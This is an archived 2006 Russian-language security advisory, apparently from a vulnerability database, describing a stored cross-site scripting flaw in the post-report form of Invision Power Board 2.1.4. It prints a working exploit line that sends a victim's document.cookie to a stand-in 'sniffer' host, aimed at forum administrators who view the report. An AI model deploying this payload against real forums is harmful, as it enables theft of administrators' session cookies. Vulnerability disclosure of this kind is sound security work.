Active XSS in Invision Power Board 2.1.4

2006-03-02T00:00:00

Description

Здравствуйте. Очередная уязвимость найденна командой Cyber Lords(www.cyberlords.net). На этот раз в продукте Invision Power Board. Я бы посоветовал вам опубликовать данную уязвимость в отдельную новость. ------------------------------------------------------------- Advisory: Active XSS in Invision Power Board 2.1.4 Уязвимость/Vulnerability: Межсайтовый скриптинг/Cross Site Scripting Нет фильтрации входящих данных. Возможно проведение атаки межсайтовый скриптинг, отослав в форме жалобы на сообщение запрос вида: "<script>alert()</script>". С помощью данной атаки возможна утечка конфиденциальных данных пользователя на сторонний сервер. Форма находится по адресу http://forum/index.php?act=report&t=123&p=123&st=0 Exploit: <script>img = new Image(); img.src = "http://sniffer/file.php?"+document.cookie;</script> P.S. Далее у всей администрации форума, автоматически появится уведомление о жалобе. Cyber Lords www.cyberlords.net

{"id": "SECURITYVULNS:DOC:11661", "bulletinFamily": "software", "title": "Active XSS in Invision Power Board 2.1.4", "description": "\r\n\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435. \u041e\u0447\u0435\u0440\u0435\u0434\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 Cyber\r\nLords(www.cyberlords.net). \u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0435 Invision Power Board.\r\n\u042f \u0431\u044b \u043f\u043e\u0441\u043e\u0432\u0435\u0442\u043e\u0432\u0430\u043b \u0432\u0430\u043c \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0443\u044e \u043d\u043e\u0432\u043e\u0441\u0442\u044c.\r\n\r\n-------------------------------------------------------------\r\nAdvisory: Active XSS in Invision Power Board 2.1.4\r\n\r\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c/Vulnerability:\r\n\u041c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442\u0438\u043d\u0433/Cross Site Scripting\r\n\r\n\u041d\u0435\u0442 \u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 \u043c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u044b\u0439\r\n\u0441\u043a\u0440\u0438\u043f\u0442\u0438\u043d\u0433,\r\n\u043e\u0442\u043e\u0441\u043b\u0430\u0432 \u0432 \u0444\u043e\u0440\u043c\u0435 \u0436\u0430\u043b\u043e\u0431\u044b \u043d\u0430 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0438\u0434\u0430:\r\n"<script>alert()</script>".\r\n\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0434\u0430\u043d\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u0430 \u0443\u0442\u0435\u0447\u043a\u0430 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445\r\n\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0430 \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0439 \u0441\u0435\u0440\u0432\u0435\u0440.\r\n\u0424\u043e\u0440\u043c\u0430 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443\r\nhttp://forum/index.php?act=report&t=123&p=123&st=0\r\n\r\nExploit:\r\n\r\n<script>img = new Image(); img.src =\r\n"http://sniffer/file.php?"+document.cookie;</script>\r\n\r\nP.S. \u0414\u0430\u043b\u0435\u0435 \u0443 \u0432\u0441\u0435\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0444\u043e\u0440\u0443\u043c\u0430, \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u044f\u0432\u0438\u0442\u0441\u044f\r\n\u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u0435 \u043e \u0436\u0430\u043b\u043e\u0431\u0435.\r\n\r\nCyber Lords\r\nwww.cyberlords.net", "published": "2006-03-02T00:00:00", "modified": "2006-03-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11661", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:16", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 1.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:5846"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:5846"]}]}, "exploitation": null, "vulnersScore": 1.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645249717}}